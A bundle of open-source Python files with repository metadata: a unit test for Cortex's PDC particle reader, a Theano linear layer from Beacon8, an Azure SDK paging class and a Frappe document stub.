"lastWorldVelocity" : IECore.V3dVectorData,
"worldVelocityInObjectSpace" : IECore.V3dVectorData,
"worldVelocity" : IECore.V3dVectorData,
"lastWorldPosition" : IECore.V3dVectorData,
"worldPosition" : IECore.V3dVectorData,
"acceleration" : IECore.V3dVectorData,
"lastVelocity" : IECore.V3dVectorData,
"velocity" : IECore.V3dVectorData,
"lastPosition" : IECore.V3dVectorData,
"P" : IECore.V3dVectorData,
"lifespanPP" : IECore.DoubleVectorData,
"finalLifespanPP" : IECore.DoubleVectorData,
"emitterId" : IECore.DoubleVectorData,
"birthTime" : IECore.DoubleVectorData,
"age" : IECore.DoubleVectorData,
}
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedConvertedAttrNamesAndTypes ) )
for i in expectedConvertedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedConvertedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
self.assertEqual( c["particleId"].data, IECore.DoubleVectorData( range( 0, 25 ) ) )
def testReadNoPrimVarConversion( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
r["realType"].setValue( "native" )
r["convertPrimVarNames"].setValue( IECore.BoolData( False ) )
self.assertFalse( r.parameters()["convertPrimVarNames"].getTypedValue() )
self.assertEqual( r.numParticles(), 25 )
attrNames = r.attributeNames()
expectedAttrNamesAndTypes = {
"particleId" : IECore.DoubleVectorData,
"mass" : IECore.DoubleVectorData,
"lastWorldVelocity" : IECore.V3dVectorData,
"worldVelocityInObjectSpace" : IECore.V3dVectorData,
"worldVelocity" : IECore.V3dVectorData,
"lastWorldPosition" : IECore.V3dVectorData,
"worldPosition" : IECore.V3dVectorData,
"acceleration" : IECore.V3dVectorData,
"lastVelocity" : IECore.V3dVectorData,
"velocity" : IECore.V3dVectorData,
"lastPosition" : IECore.V3dVectorData,
"position" : IECore.V3dVectorData,
"lifespanPP" : IECore.DoubleVectorData,
"finalLifespanPP" : IECore.DoubleVectorData,
"emitterId" : IECore.DoubleVectorData,
"birthTime" : IECore.DoubleVectorData,
"age" : IECore.DoubleVectorData,
}
self.assertEqual( len( attrNames ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in attrNames )
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["position"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
self.assertEqual( c["particleId"].data, IECore.DoubleVectorData( range( 0, 25 ) ) )
def testFiltering( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
attributesToLoad = [ "position", "age" ]
r.parameters()["percentage"].setValue( IECore.FloatData( 50 ) )
r.parameters()["attributes"].setValue( IECore.StringVectorData( attributesToLoad ) )
a = r.readAttribute( "position" )
# what the acceptable thresholds should be is somewhat debatable,
# especially for such a small number of particles
self.assert_( len( a ) < 13 )
self.assert_( len( a ) > 7 )
p = r.read()
self.assert_( p.numPoints < 13 )
self.assert_( p.numPoints > 7 )
convertedAttributesToLoad = [ "P", "age" ]
for attr in convertedAttributesToLoad :
self.assertEqual( p.numPoints, p[attr].data.size() )
# compare filtering with int ids
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.intId.250.pdc" )
attributesToLoad = [ "position", "age" ]
r.parameters()["percentage"].setValue( IECore.FloatData( 50 ) )
r.parameters()["attributes"].setValue( IECore.StringVectorData( attributesToLoad ) )
a2 = r.readAttribute( "position" )
self.assertEqual( a, a2 )
# compare filtering with no ids at all
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.noId.250.pdc" )
attributesToLoad = [ "position", "age" ]
r.parameters()["percentage"].setValue( IECore.FloatData( 50 ) )
r.parameters()["attributes"].setValue( IECore.StringVectorData( attributesToLoad ) )
a3 = r.readAttribute( "position" )
self.assertNotEqual( a3, a )
# what the acceptable thresholds should be is somewhat debatable,
# especially for such a small number of particles
self.assert_( len( a ) < 15 )
self.assert_( len( a ) > 8 )
def testConversion( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
r.parameters()["realType"].setValue( "float" )
expectedAttrNamesAndTypes = {
"particleId" : IECore.FloatVectorData,
"mass" : IECore.FloatVectorData,
"lastWorldVelocity" : IECore.V3fVectorData,
"worldVelocityInObjectSpace" : IECore.V3fVectorData,
"worldVelocity" : IECore.V3fVectorData,
"lastWorldPosition" : IECore.V3fVectorData,
"worldPosition" : IECore.V3fVectorData,
"acceleration" : IECore.V3fVectorData,
"lastVelocity" : IECore.V3fVectorData,
"velocity" : IECore.V3fVectorData,
"lastPosition" : IECore.V3fVectorData,
"P" : IECore.V3fVectorData,
"lifespanPP" : IECore.FloatVectorData,
"finalLifespanPP" : IECore.FloatVectorData,
"emitterId" : IECore.FloatVectorData,
"birthTime" : IECore.FloatVectorData,
"age" : IECore.FloatVectorData,
}
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
def testFileNameChange( self ) :
"""Now Readers are Ops, the filename can be changed and read() can be called
again. So we need to check that that works."""
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
r.parameters()["realType"].setValue( "float" )
expectedAttrNamesAndTypes = {
"particleId" : IECore.FloatVectorData,
"mass" : IECore.FloatVectorData,
"lastWorldVelocity" : IECore.V3fVectorData,
"worldVelocityInObjectSpace" : IECore.V3fVectorData,
"worldVelocity" : IECore.V3fVectorData,
"lastWorldPosition" : IECore.V3fVectorData,
"worldPosition" : IECore.V3fVectorData,
"acceleration" : IECore.V3fVectorData,
"lastVelocity" : IECore.V3fVectorData,
"velocity" : IECore.V3fVectorData,
"lastPosition" : IECore.V3fVectorData,
"P" : IECore.V3fVectorData,
"lifespanPP" : IECore.FloatVectorData,
"finalLifespanPP" : IECore.FloatVectorData,
"emitterId" : IECore.FloatVectorData,
"birthTime" : IECore.FloatVectorData,
"age" : IECore.FloatVectorData,
}
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), r.numParticles() )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
r["fileName"].setValue( IECore.StringData( "test/IECore/data/pdcFiles/10Particles.pdc" ) )
self.assertEqual( r.numParticles(), 10 )
c = r.read()
self.assertEqual( type( c ), IECoreScene.PointsPrimitive )
self.assertEqual( len( c ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in c )
self.assertEqual( type(c[i].data), expectedAttrNamesAndTypes[i] )
self.assertEqual( len(c[i].data), 10 )
for p in c["P"].data :
self.assertEqual( p.y, 0 )
self.assert_( abs( p.x ) < 1.1 )
self.assert_( abs( p.z ) < 1.1 )
def testParameterTypes( self ) :
p = IECoreScene.PDCParticleReader()
self.assert_( p.resultParameter().isInstanceOf( "ObjectParameter" ) )
self.assertEqual( p.resultParameter().validTypes(), [ IECoreScene.TypeId.PointsPrimitive ] )
def testWarnings( self ) :
p = IECoreScene.PointsPrimitive( 3 )
p["d"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.DoubleVectorData( [ 1, 2, 3 ] ) )
IECore.Writer.create( p, "test/particleShape1.250.pdc" ).write()
r = IECoreScene.PDCParticleReader( "test/particleShape1.250.pdc" )
c = IECore.CapturingMessageHandler()
with c :
r.read()
self.assertEqual( len( c.messages ), 0 )
r["percentage"].setTypedValue( 10 )
with c :
r.read()
self.assertEqual( len( c.messages ), 1 )
self.assertEqual( c.messages[0].level, IECore.Msg.Level.Warning )
def tearDown( self ) :
if os.path.isfile( "test/particleShape1.250.pdc" ) :
os.remove( "test/particleShape1.250.pdc" )
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "a60f03801301b6800508b70a5b568c26",
"timestamp": "",
"source": "github",
"line_count": 314,
"max_line_length": 134,
"avg_line_length": 36.44904458598726,
"alnum_prop": 0.7075578855395369,
"repo_name": "appleseedhq/cortex",
"id": "5682199b30e07d786461288db05a8e0ce3a5c5db",
"size": "13234",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/IECoreScene/PDCReader.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1374"
},
{
"name": "C",
"bytes": "66503"
},
{
"name": "C++",
"bytes": "9536541"
},
{
"name": "CMake",
"bytes": "95418"
},
{
"name": "GLSL",
"bytes": "24422"
},
{
"name": "Mathematica",
"bytes": "255937"
},
{
"name": "Objective-C",
"bytes": "2360"
},
{
"name": "Python",
"bytes": "4651272"
},
{
"name": "Tcl",
"bytes": "1796"
}
],
"symlink_target": ""
}
|
from .Module import Module
from beacon8.init import const, xavier
from beacon8.utils import create_param_and_grad
import numpy as _np
import theano as _th
class Linear(Module):
def __init__(self, nin, nout, with_bias=True, initW=xavier(), initB=const(0)):
Module.__init__(self)
self.nin = nin
self.nout = nout
self.with_bias = with_bias
self.weight, self.grad_weight = create_param_and_grad((nin, nout), initW, fan=(nin, nout), name='Wlin_{}x{}'.format(nin, nout))
if self.with_bias:
self.bias, self.grad_bias = create_param_and_grad(nout, initB, name='blin_{}'.format(nout))
def symb_forward(self, symb_input):
out = _th.tensor.dot(symb_input, self.weight)
if self.with_bias:
out += self.bias
return out
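# Illustrative usage sketch (hypothetical sizes, not in the original file):
# wiring the layer into a Theano graph.
#
#     x = _th.tensor.matrix("x")        # symbolic (batch, nin) input
#     layer = Linear(nin=128, nout=64)
#     y = layer.symb_forward(x)         # symbolic (batch, nout) output
#     f = _th.function([x], y)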
|
{
"content_hash": "7fded291a862fa23a6d004648356415b",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 135,
"avg_line_length": 28.24137931034483,
"alnum_prop": 0.6214896214896215,
"repo_name": "VisualComputingInstitute/Beacon8",
"id": "7743a8c343e0093759cdcf1f4c4067ec39f87061",
"size": "819",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "beacon8/layers/Linear.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21951"
}
],
"symlink_target": ""
}
|
from msrest.paging import Paged
class UserPaged(Paged):
"""
A paging container for iterating over a list of User object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[User]'}
}
def __init__(self, *args, **kwargs):
super(UserPaged, self).__init__(*args, **kwargs)
|
{
"content_hash": "692cb5cd9c47dabf8516eb67589b84a1",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 63,
"avg_line_length": 24,
"alnum_prop": 0.5546875,
"repo_name": "SUSE/azure-sdk-for-python",
"id": "e14d6e48f7109bb921cfe6fee46885e590f66833",
"size": "858",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/user_paged.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9090161"
}
],
"symlink_target": ""
}
|
import frappe
from frappe.model.document import Document
class NoteSeenBy(Document):
pass
|
{
"content_hash": "d3819c77d6726fd876ca04305b508878",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 42,
"avg_line_length": 18.4,
"alnum_prop": 0.8260869565217391,
"repo_name": "almeidapaulopt/frappe",
"id": "01bee05a9fee8a0ce6a005777ade237b37b68e90",
"size": "204",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/desk/doctype/note_seen_by/note_seen_by.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "67734"
},
{
"name": "HTML",
"bytes": "245760"
},
{
"name": "JavaScript",
"bytes": "2345089"
},
{
"name": "Less",
"bytes": "25489"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3436599"
},
{
"name": "SCSS",
"bytes": "248606"
},
{
"name": "Shell",
"bytes": "3505"
},
{
"name": "Vue",
"bytes": "96912"
}
],
"symlink_target": ""
}
|